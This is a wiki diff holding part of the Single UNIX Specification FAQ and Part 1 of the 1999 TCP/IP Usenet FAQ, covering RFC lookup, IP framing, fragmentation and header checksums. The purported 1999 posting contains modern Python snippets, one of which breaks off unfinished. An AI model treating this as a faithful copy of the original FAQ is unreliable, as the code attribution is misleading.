XSI User and Group Interfaces
|
||||
|
||||
endgrent(), endutxent(), getgrent(), getutxent(), getutxid(), getutxline(), pututxline(), setgrent(), setregid(), setreuid(), setutxent()
|
||||
|
||||
XSI Wide-Character Library Interfaces
|
||||
|
||||
wcswidth(), wcwidth()
|
||||
|
||||
XSI Legacy Interfaces
|
||||
|
||||
bcmp(), bcopy(), bzero(), ecvt(), fcvt(), ftime(), gcvt(), getwd(), index(), mktemp(), rindex(), utimes(), wcswcs()
|
||||
|
||||
Q20. What is the history of the development of the Single UNIX Specification?
|
||||
|
||||
The Open Group has been the custodian of the specification for the UNIX system and the trademark since 1994. This is a source level API specification which has traditionally built upon the formal IEEE POSIX standards. It is vendor neutral and not tied to any particular implementation.
|
||||
|
||||
The project that led to the creation of the Single UNIX Specification started when several vendors (Sun Microsystems, IBM, Hewlett-Packard, Novell/USL, and OSF) joined together to provide a single unified specification of the UNIX system services. By implementing a single common definition of the UNIX system services, third-party independent software vendors (ISVs) would be able to more easily deliver strategic applications on all of these vendors' platforms at once.
|
||||
|
||||
A two-pronged approach was used to develop the Single UNIX Specification. First, a set of formal industry specifications was chosen to form the overall base for the work. This would provide stability, vendor neutrality, and lay a well charted course for future application development, taking advantage of the careful work that has gone into developing these specifications. It would also preserve the portability of existing applications already developed to these core models.
|
||||
|
||||
The XPG4 Base (1992) was chosen as the stable functional base from which to start. XPG4 Base supported the POSIX.1 system interface and the ISO C standards at its core. It also provided a rich set of 174 commands and utilities.
|
||||
|
||||
To this base were added the traditional UNIX System V Interface Definition (SVID), Edition 3, Level 1 calls and the OSF Application Environment Specification (AES) Full Use interface definitions. These represented the stable central core of the latter two specifications.
|
||||
|
||||
The second part of the approach was to incorporate interfaces that were acknowledged common practice but had not yet been incorporated into any formal specification or standard. The intent was to ensure existing applications running on UNIX systems would port with relative ease to a platform supporting the Single UNIX Specification. A survey of real world applications was used to determine what additional interfaces would be required in the specification.
|
||||
|
||||
Fifty successful application packages were chosen to be analyzed using the following criteria:
|
||||
|
||||
- Ranked in International Data Corp.'s 1992 'Survey of Leading UNIX Applications',
|
||||
|
||||
- The application's domain of applicability was checked to ensure that no single application type (for example, databases) was overly represented,
|
||||
|
||||
- The application had to be available for analysis either as source code, or as a shared or dynamic linked library.
|
||||
|
||||
From the group of fifty, the top ten were selected carefully, ensuring that no more than two representative application packages in a particular problem space were chosen. The ten chosen applications were:
|
||||
|
||||
AutoCAD; Cadence; FrameMaker; Informix; Island Write/Paint; Lotus 1-2-3; SAS (4GL); Sybase; Teamwork; WordPerfect
|
||||
|
||||
APIs used by the applications that were not part of the base specifications were analyzed:
|
||||
|
||||
- If an API was used by any of the top ten applications, it was considered for inclusion.
|
||||
|
||||
- If an API was not used by one of the top ten, but was used by any three of the remaining 40 applications, it was considered for inclusion.
|
||||
|
||||
- While the investigation of these 50 applications was representative of large complex applications, it was still not considered a broad enough survey, so an additional 3500 modules were scanned. If an API was used at least seven times in modules that came from at least two platforms (to screen out vendor-specific libraries), then the interface was considered for inclusion.
|
||||
|
||||
When the survey was complete, there were 130 interfaces that did not already appear in the base specification. These interfaces were predominantly BSD interfaces that had never been covered in XPG4 Base, the SVID, or the AES, but did represent common practice in UNIX system applications developed originally on BSD-derived platforms. Such things as sockets and the 4.3BSD memory management calls were commonly used in many applications.
|
||||
|
||||
The goal was to ensure that APIs in common use were included, even if they were not in the formal specifications that made up the base. Making the Single UNIX Specification a superset of existing base specifications ensured any existing applications should work unmodified.
|
||||
|
||||
The Single UNIX Specification has evolved through several iterations. Version 2 in 1997 incorporated updates to the formal standards, as well as industry-driven additions such as large file handling, dynamic linking, datasize neutrality and extended threads functionality. Version 3 in 2001 merged with the IEEE POSIX standard.
|
||||
|
||||
A list of the interfaces in Version 3 of the Single UNIX Specification together with comparative information on the presence of the interface in other specifications is available at http://www.unix.org/v3-apis.html
|
||||
|
||||
A wall poster with the history and timeline of the Single UNIX Specification is available at http://www.unix.org/Posters/
|
||||
|
||||
Q21. How does the Single UNIX Specification compare to the Linux Standard Base?
|
||||
|
||||
The Single UNIX Specification specifies application programming interfaces (APIs) at the source level, and is about application source code portability. It is neither a code implementation nor an operating system, but a stable definition of a programming interface that those systems supporting the specification guarantee to provide to the application programmer. Efforts such as the Linux Standard Base, and similarly the iBCS2 for x86 implementations of System V, are about binary portability and define a specific binary implementation of an interface to operating system services.
|
||||
|
||||
The LSB draws on the Single UNIX Specification for many of its interfaces, although it does not formally defer to it, preferring to document any differences where they exist, such as where certain aspects of Linux cannot currently conform to the industry standards. Some interfaces are not included in the LSB because they are outside the remit of a binary runtime environment; typically these are development interfaces or user-level tools. Likewise, there are some areas in the LSB that are outside the scope of the Single UNIX Specification (for example, system administration interfaces).
|
||||
|
||||
Two white papers with further information on this topic are at: http://www.opengroup.org/platform/single_unix_specification/doc.tpl?gdid=6075, http://www.opengroup.org/platform/single_unix_specification/doc.tpl?gdid=5992.
|
||||
|
||||
Q22. What are the core technical changes in the latest version of the Single UNIX Specification?
|
||||
|
||||
The main changes are as follows: alignment with ISO/IEC 9899:1999 (ISO C), integration of the Networking Services volume (apart from XTI), support for IPv6, integration of recent POSIX realtime amendments (1003.1d, 1003.1j, 1003.1q), amendments to the core POSIX functionality from the 1003.2b and 1003.1a amendments, application of technical corrigenda from The Open Group and IEEE interpretations, revision of options, and removal of obsolescent and legacy interfaces.
|
||||
|
||||
Q23. Does removal of obsolescent utility syntax mean that implementations supporting usages of head -5 file, tail -5 file, tail -l file are no longer allowed?
|
||||
|
||||
No. In general, the intent of removing the obsolescent forms of the utility synopses was not to prevent implementations from supporting them, but to downgrade the status of their use in applications from "conforming application using an obsolescent feature" to "non-conforming application". Utilities are generally allowed to have extensions that violate the utility syntax guidelines, so long as the forms defined in the standard that are required to follow the guidelines do so. The cases cited fit this allowance. The Austin Group has more general cases under review at the present time.
|
||||
|
||||
Q24. Does an operating system have to be derived from AT&T/SCO code to meet the Single UNIX Specification?
|
||||
|
||||
No. As the owner of the UNIX trademark, The Open Group has separated the UNIX trademark from any actual code stream itself, thus allowing multiple implementations. Since the introduction of the Single UNIX Specification, there has been a single, open, consensus specification that defines the requirements for a conformant UNIX system.
|
||||
|
||||
Q25. What about UNIX Certification?
|
||||
|
||||
There is a mark, or brand, that is used to identify those products that have been certified as conforming to the Single UNIX Specification: initially UNIX 93, followed subsequently by UNIX 95, UNIX 98 and now UNIX 03. Information on the UNIX certification program, which operates under The Open Group's Open Brand, can be found at http://www.opengroup.org/certification/idx/unix.html
|
||||
|
||||
The UNIX 03 Certification Guide is available at http://www.opengroup.org/openbrand/docs/UNIX03_Certification_Guide.html.
|
||||
|
||||
The Practical Guide to the Open Brand is available at http://www.opengroup.org/openbrand/Certification_Guide/
|
||||
|
||||
The register of Certified Products is available at http://www.opengroup.org/openbrand/register/
|
||||
|
||||
Q26. Where can I get a UNIX license plate?
|
||||
|
||||
The classic "Live Free or Die" license plates can be ordered from The Open Group's publications catalog at: http://www.opengroup.org/publications/catalog/n900.htm.
|
||||
|
||||
A wall poster with the history of the license plate can be downloaded from http://www.unix.org/Posters/
|
||||
|
||||
Q27. How do I get permission to excerpt materials from the standard for reuse in my product?
|
||||
|
||||
All queries regarding permission to reproduce sections of the standard should be sent to austin-group-permissions at Open Group. Permission needs to be granted by both copyright holders, the IEEE and The Open Group.
|
||||
|
||||
Q28. How do I add a question to this FAQ?
|
||||
|
||||
Send the question (preferably with a proposed answer) to Andrew Josey.
|
||||
|
||||
105
Zim/Programme/APUE/FAQ/TCP-IP_FAQ.txt
Normal file
@@ -0,0 +1,105 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
Creation-Date: 2011-06-07T13:34:37+08:00
|
||||
|
||||
====== TCP-IP FAQ ======
|
||||
Created Tuesday 07 June 2011
|
||||
http://www.itprc.com/tcpipfaq/default.htm
|
||||
Archive-name: internet/tcp-ip/tcp-ip-faq/contents
|
||||
Version: 5.15
|
||||
Posting-Frequency: monthly (first Friday)
|
||||
Maintainer: tcp-ip-faq@eng.sun.com (Mike Oliver)
|
||||
URL: http://www.itprc.com/tcpipfaq/default.htm
|
||||
|
||||
TCP/IP Frequently Asked Questions
|
||||
Table of Contents
|
||||
|
||||
This is the Table of Contents for the Frequently Asked Questions (FAQ) list for the comp.protocols.tcp-ip Usenet newsgroup. The FAQ provides answers to a selection of common questions on the various protocols (IP, TCP, UDP, ICMP and others) that make up the TCP/IP protocol suite. It is posted to the news.answers, comp.answers and comp.protocols.tcp-ip newsgroups on or about the first Friday of every month.
|
||||
|
||||
The FAQ is posted in two parts. Part 1 contains answers to general questions and questions that concern the fundamental components of the suite. Part 2 contains answers to questions concerning common applications that depend on the TCP/IP suite for their network connectivity.
|
||||
|
||||
Comments on this document can be emailed to the FAQ maintainer at <tcp-ip-faq@eng.sun.com>.
|
||||
FAQ Part 1: Introduction and Fundamental Protocols
|
||||
Administrivia
|
||||
|
||||
Where can I find an up-to-date copy of this FAQ?
|
||||
Who wrote this FAQ?
|
||||
|
||||
About TCP/IP
|
||||
|
||||
What is TCP/IP?
|
||||
How is TCP/IP defined?
|
||||
Where can I find RFC's?
|
||||
How do I find the right RFC?
|
||||
|
||||
About IP
|
||||
|
||||
What is IP?
|
||||
How is IP carried on a network?
|
||||
Does IP Protect Data on the Network?
|
||||
What is ARP?
|
||||
What is IPv6?
|
||||
What happened to IPv5?
|
||||
What is the 6bone?
|
||||
What is the MBONE?
|
||||
What is IPsec?
|
||||
|
||||
About TCP
|
||||
|
||||
What is TCP?
|
||||
How does TCP try to avoid network meltdown?
|
||||
How do applications coexist over TCP and UDP?
|
||||
Where do I find assigned port numbers?
|
||||
|
||||
About UDP
|
||||
|
||||
What is UDP?
|
||||
|
||||
About ICMP
|
||||
|
||||
What is ICMP?
|
||||
|
||||
TCP/IP Network Operations
|
||||
|
||||
How can I measure the performance of an IP link?
|
||||
What IP addresses should I assign to machines on a private internet?
|
||||
Can I set up a gateway to the Internet that translates IP addresses, so that I don't have to change all our internal addresses to an official network?
|
||||
Can I use a single bit subnet?
|
||||
|
||||
TCP/IP Protocol Implementations
|
||||
|
||||
Where can I find TCP/IP source code?
|
||||
Where can I find TCP/IP application source code?
|
||||
Where can I find IPv6 source code?
|
||||
|
||||
Further Sources of Information
|
||||
|
||||
What newsgroups deal with TCP/IP?
|
||||
Are there any good books on TCP/IP?
|
||||
|
||||
FAQ Part 2 -- Applications and Application Programming
|
||||
What Are The Common TCP/IP Application Protocols?
|
||||
|
||||
DHCP
|
||||
DNS
|
||||
FTP
|
||||
HTTP
|
||||
IMAP
|
||||
NFS
|
||||
NNTP
|
||||
NTP
|
||||
POP
|
||||
Rlogin
|
||||
Rsh
|
||||
SMTP
|
||||
SNMP
|
||||
Ssh
|
||||
Telnet
|
||||
X Window System
|
||||
|
||||
TCP/IP Programming
|
||||
|
||||
What are sockets?
|
||||
How can I detect that the other end of a TCP connection has crashed?
|
||||
Can TCP keepalive timeouts be configured?
|
||||
Are there object-oriented network programming tools?
|
||||
@@ -0,0 +1,990 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
Creation-Date: 2011-06-07T13:35:35+08:00
|
||||
|
||||
====== Frequently Asked Questions (1999-09) Part 1 of 2 ======
|
||||
Created Tuesday 07 June 2011
|
||||
|
||||
From: tcp-ip-faq@eng.sun.com (TCP/IP FAQ Maintainer)
|
||||
Newsgroups: comp.protocols.tcp-ip
|
||||
Subject: TCP/IP FAQ; Frequently Asked Questions (1999-09) Part 1 of 2
|
||||
Date: 7 Sep 1999 03:36:53 GMT
|
||||
Message-ID: <tcp-ip-faq-1.1999-09@eng.sun.com>
|
||||
Summary: Part 1 of a 2-part informational posting that contains
|
||||
responses to common questions on basic TCP/IP network
|
||||
protocols and applications.
|
||||
X-Disclaimer: Approval for postings in *.answers is based on form, not content.
|
||||
|
||||
Archive-name: internet/tcp-ip/tcp-ip-faq/part1
|
||||
Version: 5.15
|
||||
Last-modified: 1999-09-06 20:11:43
|
||||
Posting-Frequency: monthly (first Friday)
|
||||
Maintainer: tcp-ip-faq@eng.sun.com (Mike Oliver)
|
||||
URL: http://www.itprc.com/tcpipfaq/default.htm
|
||||
|
||||
TCP/IP Frequently Asked Questions
|
||||
|
||||
Part 1: Introduction and Fundamental Protocols
|
||||
|
||||
This is Part 1 of the Frequently Asked Questions (FAQ) list for the
|
||||
comp.protocols.tcp-ip Usenet newsgroup. The FAQ provides answers to a
|
||||
selection of common questions on the various protocols (IP, TCP, UDP,
|
||||
ICMP and others) that make up the TCP/IP protocol suite. It is posted
|
||||
to the news.answers, comp.answers and comp.protocols.tcp-ip newsgroups
|
||||
on or about the first Friday of every month.
|
||||
|
||||
The FAQ is posted in two parts. Part 1 contains answers to general
|
||||
questions and questions that concern the fundamental components of the
|
||||
suite. Part 2 contains answers to questions concerning common
|
||||
applications that depend on the TCP/IP suite for their network
|
||||
connectivity.
|
||||
|
||||
Comments on this document can be emailed to the FAQ maintainer at
|
||||
<tcp-ip-faq@eng.sun.com>.
|
||||
|
||||
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
|
||||
|
||||
Table of Contents
|
||||
|
||||
FAQ Part 1: Introduction and Fundamental Protocols
|
||||
|
||||
Administrivia
|
||||
|
||||
1. Where can I find an up-to-date copy of this FAQ?
|
||||
2. Who wrote this FAQ?
|
||||
|
||||
About TCP/IP
|
||||
|
||||
1. What is TCP/IP?
|
||||
2. How is TCP/IP defined?
|
||||
3. Where can I find RFC's?
|
||||
4. How do I find the right RFC?
|
||||
|
||||
About IP
|
||||
|
||||
1. What is IP?
|
||||
2. How is IP carried on a network?
|
||||
3. Does IP Protect Data on the Network?
|
||||
4. What is ARP?
|
||||
5. What is IPv6?
|
||||
6. What happened to IPv5?
|
||||
7. What is the 6bone?
|
||||
8. What is the MBONE?
|
||||
9. What is IPsec?
|
||||
|
||||
About TCP
|
||||
|
||||
1. What is TCP?
|
||||
2. How does TCP try to avoid network meltdown?
|
||||
3. How do applications coexist over TCP and UDP?
|
||||
4. Where do I find assigned port numbers?
|
||||
|
||||
About UDP
|
||||
|
||||
1. What is UDP?
|
||||
|
||||
About ICMP
|
||||
|
||||
1. What is ICMP?
|
||||
|
||||
TCP/IP Network Operations
|
||||
|
||||
1. How can I measure the performance of an IP link?
|
||||
2. What IP addresses should I assign to machines on a private
|
||||
internet?
|
||||
3. Can I set up a gateway to the Internet that translates IP
|
||||
addresses, so that I don't have to change all our internal
|
||||
addresses to an official network?
|
||||
4. Can I use a single bit subnet?
|
||||
|
||||
TCP/IP Protocol Implementations
|
||||
|
||||
1. Where can I find TCP/IP source code?
|
||||
2. Where can I find TCP/IP application source code?
|
||||
3. Where can I find IPv6 source code?
|
||||
|
||||
Further Sources of Information
|
||||
|
||||
1. What newsgroups deal with TCP/IP?
|
||||
2. Are there any good books on TCP/IP?
|
||||
|
||||
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
|
||||
|
||||
Administrivia
|
||||
|
||||
1. Where can I find an up-to-date copy of this FAQ?
|
||||
|
||||
You can browse a hyperlinked version of this FAQ on the World Wide
|
||||
Web at <http://www.itprc.com/tcpipfaq/default.htm> in the US
|
||||
(thanks to Irwin Lazar) and at
|
||||
<http://t2.technion.ac.il/~s2845543/tcpip-faq/default.htm> in
|
||||
Israel (thanks to Uri Raz). Links to RFC's from Irwin's site refer
|
||||
to the ISI RFC repository in the US, while links to RFC's from
|
||||
Uri's site refer to the RFC repository at Imperial College in the
|
||||
UK. Use whichever gives you better response time.
|
||||
|
||||
The current version of this FAQ is posted on a monthly basis to
|
||||
the news.answers, comp.answers and comp.protocols.tcp-ip
|
||||
newsgroups.
|
||||
|
||||
A plaintext copy of the most recently posted version of the FAQ is
|
||||
available by anonymous FTP from
|
||||
<ftp://rtfm.mit.edu/pub/faqs/internet/tcp-ip/tcp-ip-faq/>.
|
||||
|
||||
2. Who wrote this FAQ?
|
||||
|
||||
This FAQ was compiled from Usenet postings and email contributions
|
||||
made by many people, including: Rui Duarte Tavares Bastos, Mark
|
||||
Bergman, Stephane Bortzmeyer, Rodney Brown, Dr. Charles E.
|
||||
Campbell Jr., James Carlson, Phill Conrad, Alan Cox, Michael
|
||||
Hunter, Jay Kreibrich, William Manning, Barry Margolin, Vic
|
||||
Metcalfe, Jim Muchow, George V. Neville-Neil, Dang Thanh Ngan,
|
||||
Subu Rama, Uri Raz, and W. Richard Stevens.
|
||||
|
||||
The FAQ is currently maintained by Mike Oliver. Comments,
|
||||
criticisms and contributions should be mailed to
|
||||
<tcp-ip-faq@eng.sun.com>. Please do not send TCP/IP questions to
|
||||
this address; it is intended only for FAQ issues. If you have a
|
||||
question that is not already answered by the material in this FAQ
|
||||
you will get a much faster (and probably more accurate) response
|
||||
by posting the question to the comp.protocols.tcp-ip newsgroup
|
||||
than you will by sending it to the FAQ maintainer.
|
||||
|
||||
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
|
||||
|
||||
About TCP/IP
|
||||
|
||||
1. What is TCP/IP?
|
||||
|
||||
TCP/IP is a name given to the collection (or suite) of networking
|
||||
protocols that have been used to construct the global Internet.
|
||||
The protocols are also referred to as the DoD (dee-oh-dee) or
|
||||
Arpanet protocol suite because their early development was funded
|
||||
by the Advanced Research Projects Agency (ARPA) of the US
|
||||
Department of Defense (DoD).
|
||||
|
||||
The TCP/IP name is taken from two of the fundamental protocols in
|
||||
the collection, IP and TCP. Other core protocols in the suite are
|
||||
UDP and ICMP. These protocols work together to provide a basic
|
||||
networking framework that is used by many different application
|
||||
protocols, each tuned to achieving a particular goal.
|
||||
|
||||
TCP/IP protocols are not used only on the Internet. They are also
|
||||
widely used to build private networks, called internets (spelled
|
||||
with a small 'i'), that may or may not be connected to the global
|
||||
Internet (spelled with a capital 'I'). An internet that is used
|
||||
exclusively by one organization is sometimes called an intranet.
|
||||
|
||||
2. How is TCP/IP defined?
|
||||
|
||||
All of the protocols in the TCP/IP suite are defined by documents
|
||||
called Requests For Comments (RFC's). An important difference
|
||||
between TCP/IP RFC's and other (say, IEEE or ITU) networking
|
||||
standards is that RFC's are freely available online.
|
||||
|
||||
RFC's can be composed and submitted for approval by anyone.
|
||||
Standards RFC's are often the product of many weeks or months of
|
||||
discussion between interested parties designated as working
|
||||
groups, during which time drafts of the proposed RFC are
|
||||
continually updated and made available for comment. These
|
||||
discussions typically take place on open mailing lists which
|
||||
welcome input from all quarters. The RFC approval process is
|
||||
managed by the Internet Engineering Steering Group (IESG) based on
|
||||
recommendations from the Internet Engineering Task Force (IETF)
|
||||
which is a prime mover in the formation of working groups focused
|
||||
on strategic TCP/IP issues. You can find out more about IESG and
|
||||
IETF activities from the IETF home page at
|
||||
<http://www.ietf.org/>.
|
||||
|
||||
Not all RFC's specify TCP/IP standards. Some RFC's contain
|
||||
background information, some provide hints for managing an
|
||||
internet, some document protocol weaknesses in the hope that they
|
||||
might be addressed by future standards, and some are entirely
|
||||
humorous.
|
||||
|
||||
3. Where can I find RFC's?
|
||||
|
||||
The Definitive RFC Repository
|
||||
|
||||
The official and definitive RFC repository is the anonymous FTP
|
||||
archive maintained by the Information Sciences Institute of the
|
||||
University of Southern California at <ftp://ftp.isi.edu/in-notes>.
|
||||
It is reachable via the Web at <http://www.rfc-editor.org/>.
|
||||
|
||||
RFC Repository Mirror Sites
|
||||
|
||||
The RFC repository is mirrored at many sites on the Internet, and
|
||||
you may get a faster response from a local archive than you would
|
||||
from the often-overworked ISI site. Primary mirrors are updated at
|
||||
the same time as the ISI site. Secondary mirrors may lag by a few
|
||||
hours or days. The current primary mirror sites are:
|
||||
|
||||
In the USA ...
|
||||
|
||||
Missouri:
|
||||
<ftp://wuarchive.wustl.edu/doc/rfc>
|
||||
New Jersey:
|
||||
<ftp://nisc.jvnc.net/>
|
||||
North Carolina:
|
||||
<ftp://ftp.ncren.net/rfc>
|
||||
Texas:
|
||||
<ftp://ftp.sesqui.net/pub/>
|
||||
|
||||
In Europe ...
|
||||
|
||||
France:
|
||||
<ftp://ftp.imag.fr/pub/archive/IETF/rfc>
|
||||
Italy:
|
||||
<ftp://ftp.nic.it/rfc>
|
||||
UK:
|
||||
<ftp://src.doc.ic.ac.uk/rfc>
|
||||
|
||||
Secondary mirror sites are listed in a document named
|
||||
rfc-retrieval.txt which can be found alongside the RFC's
|
||||
themselves at any of the above sites.
|
||||
|
||||
RFC's by Email
|
||||
|
||||
If you don't have direct access to the Internet but are able to
|
||||
send and receive email then you can still get RFC's through
|
||||
various email-to-ftp gateways. For instructions on how to do this,
|
||||
send email containing the text:
|
||||
|
||||
help: ways_to_get_rfcs
|
||||
|
||||
to <rfc-info@isi.edu>.
|
||||
|
||||
4. How do I find the right RFC?
|
||||
|
||||
There are over 2500 RFC's. Each RFC is known by a number. For
|
||||
instance, RFC 1180 presents a tutorial on TCP/IP, RFC 1920 lists
|
||||
the current standards RFC's and explains the RFC standards
|
||||
process, and RFC 1941 is a FAQ list on the topic of Internet
|
||||
deployment in educational establishments. RFC numbers are assigned
|
||||
in ascending order as each RFC is approved.
|
||||
|
||||
The RFC files in the archive are named rfcNNNN.txt where NNNN is
|
||||
the number of the RFC. For instance, the text of RFC 822 is
|
||||
contained in the file named rfc822.txt. A small number of RFC's
|
||||
are also available in PostScript format, in which case a file
|
||||
named rfcNNNN.ps will exist in addition to the .txt file.
|
||||
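The naming convention above is simple enough to express as a small helper. This is only an illustrative sketch: the function name and the has_postscript flag are hypothetical, and whether a given RFC actually has a PostScript version has to be checked against the archive itself.

```python
def rfc_filenames(number, has_postscript=False):
    """Return the archive file names for an RFC number.

    has_postscript is a hypothetical flag supplied by the caller; the
    archive listing is the only authority on which RFC's have a .ps file.
    """
    names = [f"rfc{number}.txt"]          # every RFC has a plaintext file
    if has_postscript:
        names.append(f"rfc{number}.ps")   # optional PostScript companion
    return names


print(rfc_filenames(822))
```

Appending one of these names to the directory of your preferred mirror gives the full location of the file.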
|
||||
Basic information (number, title, author, publication date and so
|
||||
on) on all of the RFC's is contained in the RFC index document
|
||||
named rfc-index.txt which you can find alongside the RFC's at any
|
||||
of the RFC archive sites. If you don't know which RFC's you need,
|
||||
the index is a good place to start. The index also indicates the
|
||||
current status of each RFC. The content of an RFC does not change
|
||||
once the RFC has been published, but since TCP/IP is in a constant
|
||||
state of evolution the information in one RFC is often revised,
|
||||
extended, clarified and in some cases completely superseded by
|
||||
later RFC's. Annotations in the index indicate when this is the
|
||||
case.
|
||||
|
||||
If you find yourself using the index a lot then you might find it
|
||||
convenient to create your own HTML version of the index. Wayne
|
||||
Mesard has published a Perl script that takes the plaintext index
|
||||
file as input and produces an HTML version with hyperlinks to your
|
||||
chosen RFC FTP repository or to your own local RFC archive. The
|
||||
script is available at
|
||||
<ftp://ftp.ibnets.com/pub/wmesard/>.
|
||||
|
||||
If you don't want to wade through the index, some sites provide
|
||||
the ability to search the RFC catalogue by keyword:
|
||||
|
||||
Keyword Searches on the Web
|
||||
<http://www.faqs.org/rfcs/> lets you search on RFC content.
|
||||
<http://web.nexor.co.uk/public/rfc/index/rfc.html> and
|
||||
<http://www.csl.sony.co.jp/rfc/> let you search on words in the
|
||||
RFC title.
|
||||
Keyword Searches via gopher
|
||||
<gopher://r2d2.jvnc.net/11/Internet%20Resources/RFC> or
|
||||
<gopher://muspin.gsfc.nasa.gov:4320/1g2go4%20ds.internic.net%2070%201%201/.ds/.internetdocs>
|
||||
RFC Keyword Searches via WAIS
|
||||
<wais://wais.cnam.fr/RFC>
|
||||
|
||||
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
|
||||
|
||||
About IP
|
||||
|
||||
1. What is IP?
|
||||
|
||||
Internet Protocol (IP) is the central, unifying protocol in the
|
||||
TCP/IP suite. It provides the basic delivery mechanism for packets
|
||||
of data sent between all systems on an internet, regardless of
|
||||
whether the systems are in the same room or on opposite sides of
|
||||
the world. All other protocols in the TCP/IP suite depend on IP to
|
||||
carry out the fundamental function of moving packets across the
|
||||
internet.
|
||||
|
||||
In terms of the OSI networking model, IP provides a Connectionless
|
||||
Unacknowledged Network Service, which means that its attitude to
|
||||
data packets can be characterised as "send and forget". IP does
|
||||
not guarantee to actually deliver the data to the destination, nor
|
||||
does it guarantee that the data will be delivered undamaged, nor
|
||||
does it guarantee that data packets will be delivered to the
|
||||
destination in the order in which they were sent by the source,
|
||||
nor does it guarantee that only one copy of the data will be
|
||||
delivered to the destination.
|
||||
|
||||
Because it makes so few guarantees, IP is a very simple protocol.
|
||||
This means that it can be implemented fairly easily and can run on
|
||||
systems that have modest processing power and small amounts of
|
||||
memory. It also means that IP demands only minimal functionality
|
||||
from the underlying medium (the physical network that carries
|
||||
packets on behalf of IP) and can be deployed on a wide variety of
|
||||
networking technologies.
|
||||
|
||||
The no-promises type of service offered by IP is not directly
|
||||
useful to many applications. Applications usually depend on TCP or
|
||||
UDP to provide assurances of data integrity and (in TCP's case)
|
||||
ordered and complete data delivery.
|
||||
|
||||
The fundamentals of IP are defined in RFC 791. RFC 1122 summarises
|
||||
the requirements that must be met by an IP implementation in an
|
||||
Internet host, and RFC 1812 summarises the IP requirements for an
|
||||
Internet router.
|
||||
|
||||
2. How is IP carried on a network?
|
||||
|
||||
IP really isn't very fussy about how its packets are transported.
|
||||
The details of how an IP packet is carried over a particular kind
|
||||
of network are usually chosen to be convenient for the network
|
||||
itself. As long as the transmitter and receiver observe some
|
||||
convention that allows IP packets to be differentiated from any
|
||||
other data that might be seen by the receiver, then IP can be used
|
||||
to carry data between those stations.
|
||||
|
||||
On a LAN, IP is carried in the data portion of the LAN frame and
|
||||
the frame header contains additional information that identifies
|
||||
the frame as an IP frame. Different LAN's have different
|
||||
conventions for carrying that additional information. On an
|
||||
Ethernet the Ethertype field is used; a value of 0x0800 identifies
|
||||
a frame that contains IP data. FDDI and Token Ring use frames that
|
||||
conform to IEEE 802 Logical Link Control, and on those LAN's IP is
|
||||
carried in Unnumbered Information frames with Source and
|
||||
Destination LSAP's of 0xAA and a SNAP header of 00-00-00-08-00.
|
||||
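As a rough illustration of the Ethernet case, the sketch below reads the Ethertype field from a raw frame and tests it against 0x0800. It assumes a plain Ethernet II frame (6-byte destination, 6-byte source, 2-byte type) with no VLAN tag; the function names are made up for this example.

```python
import struct

ETHERTYPE_IP = 0x0800  # value that marks a frame as carrying IP data


def ethertype(frame: bytes) -> int:
    """Return the 16-bit Ethertype of an untagged Ethernet II frame."""
    if len(frame) < 14:
        raise ValueError("frame shorter than an Ethernet header")
    # Bytes 0-5: destination, bytes 6-11: source, bytes 12-13: type.
    (value,) = struct.unpack("!H", frame[12:14])
    return value


def carries_ip(frame: bytes) -> bool:
    """True if the frame header identifies the payload as an IP packet."""
    return ethertype(frame) == ETHERTYPE_IP
```

A receiver would hand the bytes after the 14-byte header to its IP layer only when carries_ip() is true.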
|
||||
The only thing that IP cares strongly about is the maximum size of
|
||||
a frame that can be carried on the medium. This controls whether,
|
||||
and to what extent, IP must break down large data packets into a
|
||||
train of smaller packets before arranging for them to be
|
||||
transmitted on the medium. This activity is called "fragmentation"
|
||||
and the resulting smaller and incomplete packets are called
|
||||
"fragments". The final destination is responsible for rebuilding
|
||||
the original IP packet from its fragments, an activity called
|
||||
"fragment reassembly".
|
||||
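The idea of fragmentation and reassembly can be sketched in a few lines. This is a simplified model, not a real IP implementation: it assumes a fixed 20-byte IP header, represents each fragment as a tuple rather than a real packet, and relies on the RFC 791 rule that fragment offsets are counted in 8-byte units. The function names are hypothetical.

```python
def fragment(payload: bytes, mtu: int, header_len: int = 20):
    """Split payload into (offset_in_8_byte_units, more_fragments, data)."""
    # Every fragment except the last must carry a multiple of 8 data bytes.
    max_data = (mtu - header_len) // 8 * 8
    if max_data <= 0:
        raise ValueError("MTU too small to carry any data")
    fragments = []
    for start in range(0, len(payload), max_data):
        chunk = payload[start:start + max_data]
        more = start + len(chunk) < len(payload)  # False only on the last one
        fragments.append((start // 8, more, chunk))
    return fragments


def reassemble(fragments):
    """Rebuild the payload; fragments may arrive in any order."""
    ordered = sorted(fragments, key=lambda f: f[0])
    return b"".join(chunk for _, _, chunk in ordered)
```

Sorting by offset in reassemble() reflects the fact that IP does not promise to deliver fragments in order.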
|
||||
3. Does IP Protect Data On The Network?
|
||||
|
||||
IP itself does not guarantee to deliver data correctly. It leaves
|
||||
all issues of data protection to the transport protocol. Both TCP
|
||||
and UDP have mechanisms that guarantee that the data they deliver
|
||||
to an application is correct.
|
||||
|
||||
IP does try to protect the packet's IP header, the relatively
|
||||
small part of each packet that controls how the packet is moved
|
||||
through the network. It does this by calculating a checksum on the
|
||||
header fields and including that checksum in the transmitted
|
||||
packet. The receiver verifies the IP header checksum before
|
||||
processing the packet. Packets whose checksums no longer match
|
||||
have been damaged in some way and are simply discarded.
|
||||
|
||||
The IP checksum is discussed in detail in RFC 1071, which also
|
||||
includes sample code for calculating the checksum. RFC 1141 and
|
||||
RFC 1624 describe incremental modification of an existing
|
||||
checksum, which can be useful in machines such as routers which
|
||||
modify fields in the IP header while forwarding a packet and
|
||||
therefore need to compute a new header checksum.
|
||||
|
||||
The same checksum algorithm is used by TCP and UDP, although they
|
||||
include the data portion of the packet (not just the header) in
|
||||
their calculations.
|
||||
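For readers who want to see the checksum in action, here is a minimal Python sketch of the one's-complement sum that RFC 1071 describes. It is written for clarity rather than speed, and the function name is an assumption of this example; RFC 1071 remains the reference for real implementations.

```python
def internet_checksum(data: bytes) -> int:
    """16-bit one's-complement checksum in the style of RFC 1071."""
    if len(data) % 2:
        data += b"\x00"                      # pad odd-length input with a zero byte
    total = 0
    for i in range(0, len(data), 2):
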